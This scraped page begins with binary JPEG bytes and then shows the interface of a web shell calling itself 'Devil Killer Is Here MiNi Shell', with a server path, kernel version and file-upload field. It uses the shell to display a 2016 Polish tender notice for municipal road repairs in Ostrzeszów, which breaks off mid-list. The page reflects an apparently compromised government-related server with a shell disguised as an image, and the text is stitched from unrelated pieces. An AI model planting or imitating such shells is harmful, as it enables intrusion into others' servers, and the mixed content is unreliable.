JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160202/22772-N-2016.html

<p class="kh_header"><b>Ostrzeszów: Remont dróg gminnych</b><br>
<b>Numer ogłoszenia: 22772 - 2016; data zamieszczenia: 02.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Ostrzeszów , ul. Zamkowa 31, 63-500 Ostrzeszów, woj. wielkopolskie, tel. 62 7320600, faks 62 7320601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrzeszow.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Nazwa zamówienia:  Remont dróg gminnych.

2.	Przedmiotem zamówienia jest wykonanie remontu dróg gminnych na terenie miasta i gminy Ostrzeszów. 

3.	Zamówienie zostało podzielone na dwie  części:

Część Nr 1 zamówienia - Remont dróg gruntowych żużlem paleniskowym, profilowanie dróg równiarką, ścinka poboczy, obejmuje:

1)	Naprawę dróg gruntowych żużlem paleniskowym z rozścieleniem materiału równiarką samojezdną i uwałowaniem walcem samojezdnym,
2)	Mechaniczne profilowanie dróg równiarką samojezdną,
3)	Mechaniczne zagęszczenie nawierzchni walcem samojezdnym,
4)	Ścinkę  poboczy dróg równiarką na szerokości 0,5 m przy średniej grubości 0,10 m 
z zachowaniem spadku 6-8% oraz wywozem nadmiaru ziemi na odległość do 3 km.  

Część nr 2 zamówienia - Remont dróg gruntowych tłuczniem i destruktem bitumicznym, obejmuje:

1)	Roboty pomiarowe przy robotach liniowych (drogi), które polegają na odtworzeniu trasy i punktów wysokościowych dróg w terenie (wyznaczenie granicy oraz szerokości pasa drogowego). 
2)	Mechaniczną ścinkę drzew o średnicy pni pow. 60 cm wraz z wywiezieniem pni do 10 km oraz uporządkowaniem terenu. 
3)	Mechaniczne karczowanie pni o średnicy pow. 60 cm wraz z wywiezieniem karpiny do10 km.
4)	Mechaniczną ścinkę drzew o średnicy pni 30-60 cm wraz z wywiezieniem pni do 10 km oraz uporządkowaniem terenu. 
5)	Mechaniczne karczowanie pni o średnicy 30-60 cm wraz z wywiezieniem karpiny do10 km.
6)	Mechaniczną ścinkę drzew o średnicy pni 16-30 cm wraz z wywiezieniem pni do 10 km oraz uporządkowaniem terenu. 
7)	Mechaniczne  karczowanie pni o średnicy 16-30 cm wraz z wywiezieniem karpiny do10 km.
8)	Mechaniczne karczowanie zagajników (krzaków): średnich (od 31-60 % powierzchni) wraz z wywiezieniem gałęzi do 10 km.
9)	Dowóz  piasku wraz z załadunkiem wbudowaniem, profilowaniem i zagęszczeniem na podniesienie niwelety drogi. 
10)	Zebranie, załadunek i wywóz  gruntu do 10 km w celu obniżenia niwelety drogi. 
11)	Ścinkę poboczy dróg na szerokości 0,5 m przy średniej grubości 0,10 m                                 z zachowaniem spadku 6-8% oraz wywozem nadmiaru ziemi na odległość do 3 km.
12)	Regulację wysokości studni i zaworów.
13)	Wykonanie koryta oraz nawierzchni z tłucznia kamiennego ze skały granitowej frakcji 31,5-63 mm poprzez rozścielenie równiarką samojezdną, zaklinowanie klińcem kamiennym ze skały granitowej frakcji 4-10 mm i uwałowanie walcem samojezdnym. Grubość warstwy tłucznia kamiennego po uwałowaniu 15 cm.                           
14)	Wykonanie koryta oraz nawierzchni z tłucznia kamiennego ze skały granitowej frakcji 31,5-63 mm poprzez rozścielenie równiarką samojezdną, zaklinowanie klińcem kamiennym ze skały granitowej frakcji 4-10 mm i uwałowanie walcem samojezdnym. Grubość warstwy tłucznia kamiennego po uwałowaniu 10 cm.                         
15)	Naprawę dróg tłuczniem kamiennym ze skały granitowej frakcji 31,5-63 mm                        z rozścieleniem, zaklinowaniem klińcem kamiennym ze skały granitowej frakcji 4-10 mm  i uwałowaniem.
16)	Naprawę dróg destruktem bitumicznym poprzez jego rozścielenie równiarką samojezdną i uwałowanie walcem samojezdnym. Grubość warstwy destruktu po uwałowaniu 10cm. 
17)	Podwójne powierzchniowe utrwalenie podbudowy tłuczniowej asfaltem i grysami przez oczyszczenie istniejącej podbudowy a następnie skropienie asfaltem D 180/220 w ilości 2,8 kg/m2, rozścielenie grysu 8-16 mm w ilości 32,4 kg/m2 i uwałowanie walcem drogowym. Warstwa górna wykonana zostanie poprzez skropienie asfaltem D180/220 w ilości 1,7 kg/m2, rozścielenie grysu 5-8 mm w ilości 23,4 kg/m2                                   i uwałowanie walcem. Niezwiązane ziarna należy usunąć poprzez oczyszczenie szczotką mechaniczną.  
18)	Remont cząstkowy nawierzchni tłuczniowej przy głębokości wyboi do 10 cm tłuczniem kamiennym ze skały granitowej  frakcji 31,5-63 mm z rozścieleniem, zaklinowaniem klińcem kamiennym ze skały granitowej frakcji 4-10 mm                                                 i uwałowaniem.
19)	Roboty ziemne wykonane koparkami podsiębiernymi o poj. łyżki 0,25 m3                              z demontażem zdeforomowanych rur oraz wybranie warstwy pod podbudowę                      (z wywozem materiału z rozbiórki na odległość do 3 km).
20)	Wykonanie nowej podbudowy z tłucznia kamiennego ze skały granitowej frakcji                  31,5-63 mm pod rurę gr. 20 cm po zagęszczeniu.
21)	Dostawa i ułożenie rur Wipro żelbet II (RWZ-2) lub równoważne o 400 mm.
22)	Dostawa i ułożenie rur Wipro żelbet II (RWZ-2) lub równoważne o 600 mm.
23)	Przepusty pod koroną drogi, kanały z rur PCV łączonych na wcisk o średnicy zewnętrznej O 400 mm z zasypaniem i zagęszczeniem.
24)	Ścianki czołowe dla przepustów rurowych o średnicy O 400 mm.
25)	Przepusty pod koroną drogi, kanały z rur PCV łączonych na wcisk o średnicy zewnętrznej O 600 mm z zasypaniem i zagęszczeniem.
26)	Ścianki czołowe dla przepustów rurowych o średnicy O 600 mm.
27)	Zasypanie wykopów w gruncie kat. I-II, z zagęszczeniem mechanicznym, grubość zagęszczanej warstwy 30 cm.
28)	Wykonanie koryta oraz rozłożenie i zagęszczenie tłucznia kamiennego ze skały granitowej frakcji 0-63 mm o gr. 15 cm po zagęszczeniu wraz z dowozem materiału do 10 km (materiał inwestora).

4.	Opis i warunki realizacji zamówienia określa dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót budowlanych oraz istotne postanowienia umowy. Podane przez Zamawiającego ilości robót są ilościami szacunkowymi przyjętymi dla potrzeb  przeprowadzenia postępowania o udzielenie zamówienia, w tym dla oceny ofert.  Rzeczywista, ostateczna ilość robót wykonywanych w okresie obowiązywania umowy, będzie uzależniona od faktycznych potrzeb, określonych przez Zamawiającego w trakcie realizacji zamówienia. Zamawiający będzie sukcesywnie zlecał Wykonawcy roboty 
w miarę potrzeb, wynikających ze stanu technicznego dróg.

5.	Roboty wykonywane będą na czynnych dla ruchu drogach gminnych, przy zachowaniu obowiązujących przepisów i warunków bhp podczas prowadzenia robót drogowych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(dotyczy Części Nr 1 zamówienia)

- w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek  ich posiadania, Wykonawca musi wykazać posiadanie aktualnego i ważnego, właściwego dla terenu objętego realizacją przedmiotu zamówienia, zezwolenia, zgodnie z przepisami  ustawy z dnia 14 grudnia 2012 r.               o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.), na odzysk lub przetwarzanie oraz transport odpadu, tj. żużla  paleniskowego,

(dotyczy Części Nr 2 zamówienia)

- w zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek  ich posiadania, Wykonawca musi wykazać posiadanie aktualnego i ważnego, właściwego dla terenu objętego realizacją przedmiotu zamówienia, zezwolenia, zgodnie z przepisami  ustawy z dnia 14 grudnia 2012 r.               o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.), na odzysk lub przetwarzanie oraz transport odpadu, tj. destruktu bitumicznego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>( dotyczy Części Nr 1 zamówienia )
- na potwierdzenie spełniania warunku w zakresie  posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:
1) roboty polegające na naprawie, utwardzeniu lub wyrównaniu dróg żużlem paleniskowym, łącznie w ilości co najmniej 300 m3 wbudowanego żużla,
2)   roboty polegające na profilowaniu dróg równiarką, łącznie na powierzchni co najmniej  
50 000 m2.
Zamawiający zastrzega, że są to najważniejsze roboty  jakie powinien wykazać Wykonawca, w zakresie niezbędnym do oceny spełniania warunku posiadania wiedzy          i doświadczenia. Przez najważniejsze roboty budowlane rozumie się roboty wykazywane na potwierdzenie spełniania opisanego warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia,


( dotyczy Części Nr 2 zamówienia )
- na potwierdzenie spełniania warunku w zakresie  posiadania wiedzy i doświadczenia Wykonawca  zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:

1)  roboty polegające na wyrównaniu, utwardzeniu lub wykonaniu podbudowy dróg, kruszywem kamiennym łamanym, łącznie na powierzchni co najmniej 9 000 m2; 
2)  roboty polegające na  powierzchniowym utrwaleniu nawierzchni tłuczniowej lub bitumicznej, łącznie  na powierzchni co najmniej 1 500 m2. 

Zamawiający zastrzega, że są to najważniejsze roboty  jakie powinien wykazać Wykonawca, w zakresie niezbędnym do oceny spełniania warunku posiadania wiedzy          i doświadczenia. Przez najważniejsze roboty budowlane rozumie się roboty wykazywane na potwierdzenie spełniania opisanego warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca zobowiązany jest wykazać dysponowanie osobą, która będzie uczestniczyć w wykonywaniu zamówienia posiadającą  uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności drogowej  lub uprawnienia budowlane, wydane na podstawie uprzednio lub odrębnych obowiązujących przepisów.

U W A G A:  ilekroć Zamawiający wymaga określonych uprawień do kierowania robotami budowlanymi, rozumie przez to uprawnienia   budowlane ( w tym przynależność - wpis na listę członków ??- do właściwej Izby Samorządu Zawodowego, jeżeli obowiązek przynależności do izby samorządu zawodowego wynika z obowiązujących przepisów) na podstawie ustawy - Prawo Budowlane lub odpowiadające im ważne uprawnienia  budowlane, wydane na podstawie uprzednio lub odrębnych obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wyżej wymienionym wykazie i złożenia poświadczeń, dotyczy tylko tych robót budowlanych, które potwierdzają spełnianie warunku w zakresie wiedzy i doświadczenia, o którym mowa w pkt. III.3.2 ogłoszenia,  tj:

( dotyczy Części Nr 1 zamówienia )
- na potwierdzenie spełniania warunku w zakresie  posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:
1) roboty polegające na naprawie, utwardzeniu lub wyrównaniu dróg żużlem paleniskowym, łącznie w ilości co najmniej 300 m3 wbudowanego żużla,
2)   roboty polegające na profilowaniu dróg równiarką, łącznie na powierzchni co najmniej  
50 000 m2.
Zamawiający zastrzega, że są to najważniejsze roboty  jakie powinien wykazać Wykonawca, w zakresie niezbędnym do oceny spełniania warunku posiadania wiedzy          i doświadczenia. Przez najważniejsze roboty budowlane rozumie się roboty wykazywane na potwierdzenie spełniania opisanego warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia,

( dotyczy Części Nr 2 zamówienia )
- na potwierdzenie spełniania warunku w zakresie  posiadania wiedzy i doświadczenia Wykonawca  zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:

1)  roboty polegające na wyrównaniu, utwardzeniu lub wykonaniu podbudowy dróg, kruszywem kamiennym łamanym, łącznie na powierzchni co najmniej 9 000 m2; 
2)  roboty polegające na  powierzchniowym utrwaleniu nawierzchni tłuczniowej lub bitumicznej, łącznie  na powierzchni co najmniej 1 500 m2. 

Zamawiający zastrzega, że są to najważniejsze roboty  jakie powinien wykazać Wykonawca, w zakresie niezbędnym do oceny spełniania warunku posiadania wiedzy          i doświadczenia. Przez najważniejsze roboty budowlane rozumie się roboty wykazywane na potwierdzenie spełniania opisanego warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest pełnomocnictwo Wykonawców wspólnie ubiegających się o udzielenie zamówienia dla podmiotu  uprawnionego do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez upoważnionych przedstawicieli każdego z nich. Pełnomocnictwo należy załączyć do oferty w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem.

2.	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy złożyć: 
oświadczenia i dokumenty potwierdzające  brak podstaw do wykluczenia z postępowania o udzielenie zamówienia, dotyczące każdego z Wykonawców  wspólnie ubiegających się o udzielenie zamówienia, w zakresie wymaganym dla Wykonawcy (dokumenty wymienione w pkt. III.4.2 i III.4.4 ogłoszenia). 

3.	Dokumenty składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez  Wykonawcę.

4	Zgodnie z art. 26 ust. 2b ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami            w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Z treści tego dokumentu musi wynikać:
a)	zakres dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposób wykorzystania zasobów innego podmiotu, przesz Wykonawcę, przy wykonywaniu zamówienia,
c)	charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.

5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku  innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy Pzp, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.


6.	Dowodami, o których mowa w pkt.III.4.1 są:
1)   poświadczenie;
2) w przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.

 7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na 
 język polski.

8.	W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane, dostawy lub usługi wskazane w wykazie, o którym mowa w pkt. III.4.1, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt. 6</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
2.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem pkt. 3.
3.	Zmiany zawartej umowy mogą nastąpić w szczególności w przypadku: 
1)	wystąpienia okoliczności skutkujących potrzebą zmiany przedmiotu lub umówionego terminu wykonania zamówienia:
a)  z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia, proponowanych przez Zamawiającego lub Wykonawcę: 
b)     z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa;
c)   z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy;
d)  z powodu okoliczności siły wyższej, np: 
- wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, których nie można było przewidzieć z pewnością, w szczególności zagrażających bezpośrednio życiu lub zdrowiu ludzi lub grożących powstaniem szkody o znacznych rozmiarach;
- wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót z zachowaniem wymogów technologicznych;	
2)	wystąpienia okoliczności skutkujące zmianą podwykonawcy lub całkowitą rezygnacją z podwykonawstwa;
